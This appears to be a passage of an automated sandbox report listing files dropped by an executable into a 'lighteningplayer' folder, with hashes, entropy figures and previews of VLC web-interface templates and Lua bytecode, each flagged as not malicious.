                                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8" standalone="yes" ?<?vlc print'>'?>..<?vlc --[[..vim:syntax=lua.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< browse.xml: VLC media player web interface..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2006 the VideoLAN team..< $Id$..< ..< Authors: Antoine Cellerier <dionoea -at- videolan -dot- org>..< ..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...< ..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...< ..< You should have received a copy of the GNU General Pu
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:exported SGML document, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1384
                                                                                                                                                                                      Entropy (8bit):4.8192626316401475
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:eTZR0fzRH2xZ/zhA1yRfOkHiluTbV2B+vD+YWCWmWyWvsOW3:eFsVW3zsyRJHiroNRRfKL8
                                                                                                                                                                                      MD5:F49845331585BF2709690967A4A01E29
                                                                                                                                                                                      SHA1:0E64076296E5175C415417B33215524180D31453
                                                                                                                                                                                      SHA-256:064E318623B40CA2320694A06CD2E32C874475F70CDAF7A1CB5AB42D07953016
                                                                                                                                                                                      SHA-512:FC2FE93F14FB6D118134965D8B45A8BDEDACA7E7BDE528AB79172A052EE2403D15429F4417511A36BF2A5879393CEEF792D05B4DDC9F47616BF768D786BAD105
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <?vlc --[[.vim:syntax=lua. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >.< playlist.json: VLC media player web interface.< this should mirror the content of playlist.xml.< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >.< Copyright (C) 2005-2006 the VideoLAN team.< $Id$.<.< Authors: Rob Jonson <rob -at- hobbyistsoftware -dot- com>.<.< This program is free software; you can redistribute it and/or modify.< it under the terms of the GNU General Public License as published by.< the Free Software Foundation; either version 2 of the License, or.< (at your option) any later version..<.< This program is distributed in the hope that it will be useful,.< but WITHOUT ANY WARRANTY; without even the implied warranty of.< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.< GNU General Public License for more details..<.< You should have received a copy of the GNU General Public License.< along with this program; if not
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2331
                                                                                                                                                                                      Entropy (8bit):5.075950742581632
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:ctJzGbUZVdI9+k0y4Hfyt1YPV0OAVcJurTeuVcpmuf5K3lv:ORkEfytzOkcmemcs3lv
                                                                                                                                                                                      MD5:E075693E85BCA004768E1F764B69E0EF
                                                                                                                                                                                      SHA1:A183BB845B1DD101CF6AD6F3B1538015E5ABE53E
                                                                                                                                                                                      SHA-256:73DA0C5CF3F992C8DA8572C84B8071F74AF18D0C980173395374C65660615F2C
                                                                                                                                                                                      SHA-512:80945B4932BBFE3767B85424825ACD0DF453FB22DD3B075F2CCD6372B3AFFDF527CF0CBB1E474B6B7B00189913D0B84009829FF2006C5D131E0109A2B92B7FCD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8" standalone="yes" ?<?vlc print'>'?>..<?vlc --[[..vim:syntax=lua.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< playlist.xml: VLC media player web interface..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2006 the VideoLAN team..< $Id$..<..< Authors: Antoine Cellerier <dionoea -at- videolan -dot- org>..< Authors: Rob Jonson <rob -at- hobbyistsoftware -dot- com>..<..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist_jstree.xml
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3140
                                                                                                                                                                                      Entropy (8bit):4.931935836490905
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:ctJzGbUZXnE9+Y0y4Hf21YPw7q8LgAgrXqYHLWxbTfCdYjLL96WQ:O5YEf23OLsL0
                                                                                                                                                                                      MD5:0163ED96652896F7717BDAA348897B58
                                                                                                                                                                                      SHA1:6D2E6828D05F735BFCA2846FE704E158977F06A8
                                                                                                                                                                                      SHA-256:5055393661DB15CCEF1D229A7C48334D7F20710F613519FE5994FC62723A5DDE
                                                                                                                                                                                      SHA-512:109EAC05CCF5729645237C41812310CA23C7D1AF24D0A897831EF7AEBD7434A3EC8E20C4DC08550826706AAE65609FD0A26EDF5FD5DF7BFC3EBE0303B106183F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8" standalone="yes" ?<?vlc print'>'?>..<?vlc --[[..vim:syntax=lua.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< playlist.xml: VLC media player web interface..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2006 the VideoLAN team..< $Id$..< ..< Authors: Antoine Cellerier <dionoea -at- videolan -dot- org>..< ..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...< ..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...< ..< You should have received a copy of the GNU General
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.json
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:exported SGML document, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1427
                                                                                                                                                                                      Entropy (8bit):4.810529837134612
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:c2PbTUAe0fXRH2xZ/zM1yRfOkHilCTbV2B+vDUYWCWmWqWG8WvT:c2PbwAzBW3zyyRJHiLo/RRLx8KT
                                                                                                                                                                                      MD5:299B8075ABD804616EDCC490A69C4AB1
                                                                                                                                                                                      SHA1:0677EE88E29376F9E51830150941C21EAA7A3C9D
                                                                                                                                                                                      SHA-256:5ED55825A158098FAB7419C620ED5641D7C70A4232A1FF1DE290E39E4517A358
                                                                                                                                                                                      SHA-512:A21EAC71A7621F99CCE25409CA96CE9B6FF6AA133DFE60D7A7021816101289CE36EE8DB25428F1FEF5D62688FE8520D1A78FF1DD6A075F957FCFA8C151118361
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <?vlc --[[.vim:syntax=lua. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >.< status.xml: VLC media player web interface.< this should mirror the content and function of status.json.< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >.< Copyright (C) 2005-2009 the VideoLAN team.< $Id$.< .< Authors: Rob Jonson <rob -at- hobbyistsoftware -dot- com>.< .< This program is free software; you can redistribute it and/or modify.< it under the terms of the GNU General Public License as published by.< the Free Software Foundation; either version 2 of the License, or.< (at your option) any later version..< .< This program is distributed in the hope that it will be useful,.< but WITHOUT ANY WARRANTY; without even the implied warranty of.< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.< GNU General Public License for more details..< .< You should have received a copy of the GNU General Public License.< along with this pr
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2789
                                                                                                                                                                                      Entropy (8bit):4.918627655586448
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:chJz12PbUZenIe9+Y0y4Hf21YP90Ot3Px6FKluqKOkI4naMxt07qW7oQDN:Q40YEf2FOt3Px6FKcqKOkIqBxt0eW7o2
                                                                                                                                                                                      MD5:33FBF9082A0A74A2A6966B662467035E
                                                                                                                                                                                      SHA1:34718B6D476247BF865775D6D6B014A8460287DA
                                                                                                                                                                                      SHA-256:D87C74AB32C37024FFC895BEC2DC58AD12512D985246F4B6D62611E7A82700A8
                                                                                                                                                                                      SHA-512:BCD66F17B2B7F00694D2C9B85B696CCDA7FDEED4802E950FE2B6DB2AE81AE9E0E2D23B0AC45F33A078824A5CA29B9019729E2A25D59297343CF2908AD0BF4587
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8" standalone="yes" ?<?vlcprint'>'?>..<?vlc --[[..vim:syntax=lua.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< status.xml: VLC media player web interface..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2009 the VideoLAN team..< $Id$..< ..< Authors: Antoine Cellerier <dionoea -at- videolan -dot- org>..< ...Rob Jonson <rob -at- hobbyistsoftware -dot- com>..< ..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...< ..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...< ..<
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4597
                                                                                                                                                                                      Entropy (8bit):4.714477328356298
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:cGz5bUZXnE9+Y0y4Hf21YPh/2WMVFGF0RzbrYGvzAGGGdGGGZr/Ia6PyhPJ7MS5L:JoYEf2wuWMV+0RzbIPJ7jMgBx
                                                                                                                                                                                      MD5:C70833388885744160D133922000BB5C
                                                                                                                                                                                      SHA1:89E46132D95BD36CAE556AB5BAB80B703FB4B24B
                                                                                                                                                                                      SHA-256:55F3552B708A944A84C7F4A717846338DF957DBCC7A1898FB8B4E36B64EA62CA
                                                                                                                                                                                      SHA-512:B8154E17FB7499A07891EE47D38D8525179B860FD63F6C17D90761696EEFC5ABBE6064413590C5F8500A8AB6095960AE5D1B9F06EED422C06C011E335C0B4EBA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8" standalone="yes" ?<?vlc print '>'..--[[..vim:syntax=lua.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< vlm.xml: VLC media player web interface..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2006 the VideoLAN team..< $Id$..< ..< Authors: Antoine Cellerier <dionoea -at- videolan -dot- org>..< ..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...< ..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...< ..< You should have received a copy of the GNU General Public Licen
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm_cmd.xml
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1469
                                                                                                                                                                                      Entropy (8bit):4.953178434463786
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:2dNXDvobUZvPo6hPO99khwJ0yMOkHfl6TbVp1M+v6PX2+iJ6RF:cBAbUZXnE9+Y0y4Hf21YPWc
                                                                                                                                                                                      MD5:391869E7081B739B497DBBAB0E5332ED
                                                                                                                                                                                      SHA1:38A7F8C9F764B7A5382E4CF082AE5B252F0599FF
                                                                                                                                                                                      SHA-256:ED276E48CC38B7B064C4AEC41AEC890879A940804A0A26FA02CD444DA782DE14
                                                                                                                                                                                      SHA-512:2124A69B12AAAC3BEF6E36AD021D16A112BC40622EB4FD0303C792573A9052A12CA2993E0644F3E2D91AA0B6152CEEE578F7F24BB877060F984FC220A9C9E0A8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8" standalone="yes" ?<?vlc print '>'..--[[.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< vlm_cmd.xml: VLC media player web interface..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2006 the VideoLAN team..< $Id$..< ..< Authors: Antoine Cellerier <dionoea -at- videolan -dot- org>..< ..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...< ..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...< ..< You should have received a copy of the GNU General Public License..< along
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\view.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3587
                                                                                                                                                                                      Entropy (8bit):5.417202799956201
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:zD6Zi3y9+k0y4Hfyt1YPZZcqlidVioAN9NcHNcjVNG4rrNNE/554xpISz4l7kQMK:3kEfytUc5wPctcjxrBNOvtFXrGcR
                                                                                                                                                                                      MD5:E44DFC7766433D1424C1058ACCF5FCC7
                                                                                                                                                                                      SHA1:2017D30B08BE58EFDAFFC17AA9DF7E75C8C92393
                                                                                                                                                                                      SHA-256:D87E429E5D342C3216305B90EF8B919A7CC81D7FD103285F270E751E9048F1C3
                                                                                                                                                                                      SHA-512:EFF5C676EE1011CB3A102626E99F9BBA46C45483A606C2357711D39C3DA3BC8B60F8227475780BCCDD16F38BF38066C653C85B01F3A0B093A1463A53F30CD5DC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< view.html: VLC media player web interface - VLM..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2014 VLC authors and VideoLAN..< $Id$..<..< Authors: Brandon Brooks <bwbrooks -at- archmageinc -dot- com>..<..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...<..< You should have received a copy of the GNU General Public License..< along with this program; if not, write to the Free Software..< Foundation,
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\vlm.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1823
                                                                                                                                                                                      Entropy (8bit):5.103989865748562
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:lmIA+F6ZiTnE9+k0y4Hfyt1YP2N40pcEFNm7:1ASkEfytrHm7
                                                                                                                                                                                      MD5:AD74E2B62F7F0B0DCF3027E57B2E35BC
                                                                                                                                                                                      SHA1:7CAD78F43D2297E47AE02861DA79BB44EB193BCF
                                                                                                                                                                                      SHA-256:F4CC8D30E07025277DBC6B6FC7684AA8813C7EF5B2B32938E87C38E1AC3DF080
                                                                                                                                                                                      SHA-512:30B338F37D3E87787257B0C3340BBF0AD9EEA5DDA4A02336566292C7C65A6A3E14423F8F9E8239EDDF85FF1BD47E1E0839F8809A542FE9D8EE08033E0D042259
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.... - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< vlm.html: VLC media player web interface - VLM..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2014 VLC authors and VideoLAN..< $Id$..< ..< Authors: Antoine Cellerier <dionoea -at- videolan -dot- org>..< ..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...<..< You should have received a copy
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):308
                                                                                                                                                                                      Entropy (8bit):4.897599071945427
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:jrOVGXacFYnzgLeYwFabmFwgqbtF6n/VcXknC05ZIs1Noo0y/:jrOV3qYsEaocsVcU/ZIpy/
                                                                                                                                                                                      MD5:40671579947F74D8826D641C94814B23
                                                                                                                                                                                      SHA1:127E2B856C1E4CD0EB3A541E627962CD570295C5
                                                                                                                                                                                      SHA-256:09BD722B8C4CD442D56C7C730C2A363CF9BDFCB6A8971F00BE002C90C40215B9
                                                                                                                                                                                      SHA-512:8CEC6D4B727D9C1CD86841F4407CC2777ADE072BB6BC1F7229AED0F730068225C58DB6A063DE1B15418C2C9341369480043398F2F60BB9038423923199E5F760
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: ## <pre>..##..## <a href="vlm.html">VLM HTTP interface</a>..## This file can be loaded as is in VLM...## Comments starting with "##" were added by the HTTP interface...## You can remove them if you want to...##..<?vlc print(vlc.vlm.execute_command(vlm,"export").value) ?>....##..## end of export..## </pre>..
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):44633
                                                                                                                                                                                      Entropy (8bit):4.89913513959695
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:trh+Rda03tq0/NN5NxhE5+ghBNZwlwEyh3AlbSlJ9wwwwwwwwwwwwvz+:+Z9xdBE9bwwtmmlwwwwwwwwwwwwb+
                                                                                                                                                                                      MD5:3242B351C54A21FE1A4241E6EE3B03C1
                                                                                                                                                                                      SHA1:9DE232F6FF01146E13C07C754AA26F0F558B034A
                                                                                                                                                                                      SHA-256:DFEF93369D316B693E564A7D54646CF21925D1BE7A45591746138F9A71FF8614
                                                                                                                                                                                      SHA-512:C2082899AC0933BA37CBA90D7D67DBA582917C78AF173E1B8F1C3DE345E5853B24CADFE8C49219886D2D91BC907FAB9548F92F60BFFFC4CF02B458538A41D850
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......<...@../../extras/package/win32/../../../share/lua/intf/cli.lua............9.....@..........A....@........A.....$....@........A...........A......@....B...B......@....B...B...................C..@D...D...D.E.......\....@......@...@..E@..........E...F...Z.......E....A......\..........................EA..........I...EA..F...FA..............E....B......\....A..\A......EA..F...FA..............E....B......\...........\A..!....@..$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@..$.......$.......$.......$@...@......J....................@S..S.b@..............E....A...AS...T..@..........J.......I...IAT..@......A.................T...U."A..J....A.......B..EB..F...FB...........U...U.bA.......A......EB...B....V..BV..A..........J.......I...I.V.I.W..A......AB.......B.......W.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\intf\dummy.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):819
                                                                                                                                                                                      Entropy (8bit):4.9723691235127445
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:X8bHK/ojVI9QclwEZKqyprrT2tFOj43iXp4KniimlRpMwu66666m6sA4:M26I20p05rrKOj43iXpH1eu66666m6Q
                                                                                                                                                                                      MD5:65189CE9885CF5649928240BDA8CD01D
                                                                                                                                                                                      SHA1:B1AFB9C7F6A99219B2A6773A06D603DEDE507755
                                                                                                                                                                                      SHA-256:38BAEE11F33139962A5269E1BB71B39A6F3EEC851F98F926396F6CD5B8BC1A4A
                                                                                                                                                                                      SHA-512:D3BCDFBD3C502983108C1A676AEBFD70E3AF99B08F7E2F0ED82C92BF5487AA2C7EA96E1FB318F3045F31F1A6722FC6F4365B25EF67C39FA0477D615A639619A2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......>...@../../extras/package/win32/../../../share/lua/intf/dummy.lua..................@............@.E................A....@...A.@....A..!@.......@....A...B..@...............msg..g...This is the `dummy' VLC Lua interface module..Please specify a VLC Lua interface to load with the --lua-intf option..VLC Lua interface modules include: `cli' and `http'..For example: vlc -I luaintf --lua-intf cli.You can also use the alternate syntax: vlc -I "luaintf{intf=cli}".See share/lua/intf/README.txt for more information about lua interface modules.......string......gmatch......([^.]+).*......vlc......err......misc......quit.................................................................................................(for generator).............(for state).............(for control).............line.............
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1755
                                                                                                                                                                                      Entropy (8bit):4.2511052233920354
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:MZilZzZsHuZOJuZAHz0YiQgScALRmdwu5eCJ+RhAiqNAEA9te0888omaVnKIu:LVsO72iQBRm7A+KYA9tT888omf/
                                                                                                                                                                                      MD5:070319585977FB0F42A60DD67351B13F
                                                                                                                                                                                      SHA1:3E55EBFFDD2A02EA6298AC4DB8E1AA4E6FC08CD7
                                                                                                                                                                                      SHA-256:28D95FC84DE6808EDDFACE65916D4B0814DCE85BB6ABFAC36D7D0D66F768F2E8
                                                                                                                                                                                      SHA-512:527D519D00FE13A2323BA10F7468BED4B4A36560C8F8998F81E7B19ADA6C74576E4757178AF0EC3468B5386E00C3AAC126CAE87E917185A8A667179B8A454B5D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......A...@../../extras/package/win32/../../../share/lua/intf/dumpmeta.lua.............s...E...F@..F...\...............K.@.\...Z.......K.A.\...F@...@......E...F...F....@...B........\@..E...F...F................@....C............\@..E...F...F............AD............\@..E...F...F.......\@..K.D.\...Z....................................B..@................A....................A...B......@........A...B......@........B..........@...............B..@....B...A........................A...B.AC..............U....C.......................F...F..@...............vlc......input......item......is_preparsed......stats......demux_read_bytes...............msg......info......name: ......name......uri: ......strings......decode_uri......uri......duration: ......tostring......duration......meta data:......metas......pairs...... ......: ...... no meta data available......info:...... ......misc......quit.....s... ... ... ... ... ...!...!...!...!...!...!...%...%...%...%...%...'...'...'...'...'.
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13229
                                                                                                                                                                                      Entropy (8bit):4.540614469056307
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:3rpBEdZ/ON2KK6XLtyIFdCWAeOXkoQYT:3EJF6RyiOX
                                                                                                                                                                                      MD5:03E16639D4696D4ABB44D7B756EF271A
                                                                                                                                                                                      SHA1:A5627446F6135A53D312BCB9793A12C1FBD434D6
                                                                                                                                                                                      SHA-256:EEBC60A3C2CDBD0BE0DD0633E93507A12B84FD74D0F0A79077B2059CCEFFF9F9
                                                                                                                                                                                      SHA-512:2F7DC4965DCBF6F05481B4D7DCEFB5DAEBDDF7A4BE57C6C06D8A3D9A7F447494E67F808905017076E776718355B91867BF8736C987E55C3AE21435DD0D77E4BB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .LuaQ.......=...@../../extras/package/win32/../../../share/lua/intf/http.lua.....................A@...@........@...A.A@...@...........@..................C..@D...D..@E...E..@F..@F........$....@..$@......$.......$.......$....@..$@......$.......$.......$....@..$@......$...E...F@..Z@......@.......\...G...E...F............A...........................@...@........@...L.AA..........U........A............@...L.A...........U....A.......A..J...G@..d.............M...............@...M...........M.AA...@...@........N............................A.......@..A...........U...ZA......A....A.......@........P...Q......A................Q..................@.......@R.....C...........................K........require......common......vlc......msg......info......Lua HTTP interface......open_tag......<?vlc......close_tag......?>......mimes......txt......text/plain......json......html......text/html......xml......text/xml......js......text/javascript......css......text/css......png......image/png......jpg....
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:Lua bytecode, version 5.1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2081
                                                                                                                                                                                      Entropy (8bit):4.545688815781294
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:MKm+W4bucma+Y/DUMhVFN1G9/2UwMLDW/U3/2gN5TWJKzbnWBPOF37:vd9+SN0OUXXWcXT1nYir
                                                                                                                                                                                      MD5:C2BF59C1030AC644E3B5B221B809256C
                                                                                                                                                                                      SHA1:19D7DF03ED0D2B7983005B39842044EAD8F3073F
                                                                                                                                                                                      SHA-256:EA4E1F2C3CAD6B7889E751F860BE9946ED112D7C6FC477AF7E3DEDDD541932BA
                                                                                                                                                                                      SHA-512:71FFC297A7CD5A280907B16BD3C87EAA4DAA97D011767DBD48FD560CDC2B97CA6817816028DE8BC33CB5890274047F6499A6317FAAFF9210D064253720F8A1DE
                                                                                                                                                                                      Malicious:false
